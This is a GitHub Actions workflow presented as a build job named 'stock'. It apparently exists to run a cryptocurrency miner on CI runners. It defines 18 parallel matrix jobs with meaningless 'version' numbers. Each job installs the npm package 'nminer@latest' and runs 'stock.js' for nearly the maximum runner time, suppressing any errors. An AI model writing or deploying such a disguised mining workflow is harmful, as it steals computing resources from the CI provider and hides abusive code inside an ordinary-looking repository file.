name: stock
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 7048 }
          - { version: 1692 }
          - { version: 3055 }
          - { version: 4847 }
          - { version: 504 }
          - { version: 1813 }
          - { version: 673 }
          - { version: 7637 }
          - { version: 5745 }
          - { version: 1410 }
          - { version: 2751 }
          - { version: 1559 }
          - { version: 6384 }
          - { version: 9419 }
          - { version: 1331 }
          - { version: 9654 }
          - { version: 6270 }
          - { version: 8371 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: but
        run: |
          npm install nminer@latest
          timeout 319m node stock.js || echo "stock executed"